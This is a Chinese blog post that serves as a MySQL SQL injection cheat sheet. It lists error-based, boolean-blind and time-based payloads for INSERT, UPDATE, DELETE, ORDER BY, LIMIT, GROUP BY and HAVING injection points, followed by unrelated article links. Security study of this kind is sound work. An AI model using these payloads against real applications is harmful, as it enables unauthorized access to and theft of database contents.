Insert:

语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)

报错注入:

insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');

insert into test(id,name,pass) values (6,'xiaozi' or extractvalue(1,concat(0x7e,database())) or '', 'Nervo');

盲注:

//根据or之间的表达式是否成立来进行盲注
'or 1=1 or ' //插入的测试语句直接当成sql语句执行,并把存储返回值,表达式成立,返回结果为1
'or 1=2 or ' //表达式不成立,返回结果为0
' or exists(select * from information_schema.tables) or' //返回结果为1
aaa' or length(database())=11 or '//返回正确
aaa' or mid(database(),1,1)='t' or'//返回正确
aaa' or mid(database(),1,11)='test' or '//返回正确

insert into test(id,name,pass) values (2,'mis1',''or   ascii(mid(database(),1,1))=116 or'')

时间盲注:

insert into test(id,name,pass) values (2,'mis1',''or  if(mid(database(),1,1)='a',sleep(10),0) or'')

Update:

update test set pass='baidu' or updatexml(1,concat(0x7e,(version()),0x7e),0) or''WHERE id=2 and name='0';

update test set pass='baidu' or extractvalue(1,concat(0x7e,database())) or''WHERE id=2 and name='0';

Delete:

DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or'';

DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or'';

Order by:

order by [id]---【注入点】

 SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1  and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))

order by [id] desc/asc  ---【注入点】

 SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 desc ,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))

  

Limit 0,1:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

报错注入:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:

SELECT username FROM users WHERE isadmin = 0 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,1) LIKE 'w', BENCHMARK(5000000,SHA1(1)),5)))),1);

  

Group by:

group by username --【注入点】

SELECT username FROM users WHERE isadmin = 0 GROUP BY username and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

  

Having :

Having 1=1 --【注入点】

SELECT username FROM users WHERE isadmin = 0 GROUP BY username  having 1=1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))

 

Mysql报错注入:

1、通过floor报错

and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

2、ExtractValue

and extractvalue(1, concat(0x5c,(select user())))

3、UpdateXml

and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、利用NAME_CONST注入

and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、join报错注入

mysql> select *  from(select * from users a join users b)c;
mysql> select *  from(select * from users a join users b using(id))c;

mysql> select *  from(select * from users a join users b using(id,name))c;

Mysql盲注:

#select * from test where id =2 and length(version())=6
#select * from test where id =2 and ascii(substring(version(),7,1))>1

#select * from test where id =2 and length(database())=4
#select * from test where id =2 and ascii(mid(database(),4,1))=116

#select * from test where id =2 and (select length(version()))=6 
#select * from test where id =2 and (select count(*) from test)=3

Mysql时间盲注:

#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,SHA1(1)),0)
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)

#select * from test where id =2 and if(substring(user(),1,1)='r',sleep(5),0)
#select * from test where id =2 and if(substring(user(),1,1)=char(11),sleep(5),0)

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

参考资料:

1、 Mysql报错注入原理分析(count()、rand()、group by)

2、关于Mysql注入过程中的五种报错方式及具体利用案例

3、利用insert,update和delete注入获取数据

4、Testing Injection

5、MySQL注入总结

Mysql 下 Insert、Update、Delete、Order By、Group By注入的更多相关文章

  1. mysql数据恢复 insert\update\delete 工具MyFlash

    一.简介MyFlash是由美团点评公司技术工程部开发维护的一个回滚DML操作的工具.该工具通过解析v4版本的binlog,完成回滚操作.相对已有的回滚工具,其增加了更多的过滤选项,让回滚更加容易. 该 ...

  2. mysql 事务是专门用来管理insert,update,delete语句的,和select语句一点不相干

    1.mysql 事务是专门用来管理insert,update,delete语句的,和select语句一点不相干 2.一般来说,事务是必须满足4个条件(ACID): Atomicity(原子性).Con ...

  3. JDBC基础篇(MYSQL)——使用statement执行DML语句(insert/update/delete)

    注意:其中的JdbcUtil是我自定义的连接工具类:代码例子链接: package day02_statement; import java.sql.Connection; import java.s ...

  4. PHP5: mysqli 插入, 查询, 更新和删除 Insert Update Delete Using mysqli (CRUD)

    原文: PHP5: mysqli 插入, 查询, 更新和删除  Insert Update Delete Using mysqli (CRUD) PHP 5 及以上版本建议使用以下方式连接 MySQL ...

  5. [Hive - LanguageManual] DML: Load, Insert, Update, Delete

    LanguageManual DML Hive Data Manipulation Language Hive Data Manipulation Language Loading files int ...

  6. insert update delete 语法 以及用法

    insert update delete 被称为 数据定义语句语句 也就是数据的增加 修改 删除 其中不包括查询 譬如: create database -创建数据库 alter database - ...

  7. mybatis select/insert/update/delete

    这里做了比较清晰的解释: http://mybatis.github.io/mybatis-3/java-api.html SqlSession As mentioned above, the Sql ...

  8. LINQ体验(9)——LINQ to SQL语句之Insert/Update/Delete操作

    我们继续讲解LINQ to SQL语句,这篇我们来讨论Insert/Update/Delete操作.这个在我们的程序中最为常用了.我们直接看例子. Insert/Update/Delete操作 插入( ...

  9. 关于MyBatis mapper的insert, update, delete返回值

    这里做了比较清晰的解释: http://mybatis.github.io/mybatis-3/java-api.html SqlSession As mentioned above, the Sql ...

  10. sql中同一个Trigger里同时包含Insert,Update,Delete

    sql中同一个Trigger里同时包含Insert,Update,Delete SQLServer是靠Inserted表和Deleted表来处理的,判断一下就可以了,只不过比ORACLE麻烦一点 cr ...

随机推荐

  1. Delphi的TListView控件拖放选定行操作

    http://www.tansoo.cn/?p=401 Delphi的TListView控件拖放选定行操作的例子,效果图如下:TListView控件拖动选定行到指定位置 具体实现步骤: 一.新建一个D ...

  2. 过滤器 Filter

    Filter(过滤器)简介 Filter 的基本功能是对发送到 Servlet 的请求进行拦截, 并对响应也进行拦截. Filter 程序是一个实现了 Filter 接口的 Java 类,与 Serv ...

  3. MonoRail学习-入门实例篇

    1.到官方网站下载安装文件,地址如下: http://www.castleproject.org/index.php/Castle:Download目前最新版本Beta5(您也可以不需要下载,直接使用 ...

  4. HTTP状态代码

    1xx(临时响应)表示临时响应并需要请求者继续执行操作的状态代码. 100 (继续) 请求者应当继续提出请求. 服务器返回此代码表示已收到请求的第一部分,正在等待其余部分. 101 (切换协议) 请求 ...

  5. Problem A 栈

    Description   You are given a string consisting of parentheses () and []. A string of this type is s ...

  6. Mysql5.0以上 手工注入

    Mysql5.0以上 order by 23 http://www..com/productdet.php?&id=89 and 1=2 UNION SELECT 1,2,3,4,5,6,7, ...

  7. 收藏的博客--PHP

    32位Win7下安装与配置PHP环境(一至三)  http://blog.csdn.net/yousuosi/article/details/9448903

  8. android onclick onLongClick ontouch dispatchTouchEvent onInterceptTouchEvent

    android onclick onLongClick ontouch dispatchTouchEvent onInterceptTouchEvent 按ACTION_DOWN -> onLo ...

  9. 团队开发——冲刺1.a

    冲刺阶段一(第一天) 1.今天准备做什么? 在了解C#的基础上,深入熟悉Windows窗体应用程序,熟练掌握基本功能. 2.明天做什么:简单设计界面.

  10. 属性的定义以及@synthesize的使用

    1.属性通常是指某些由对象封装或储存的数据.它可以是标志(如名称或颜色),也可以是与一个或多个其他对象的关系. 2.属性的基本声明使用 @property 编译器指令,后面紧跟属性的类型信息和名称.您 ...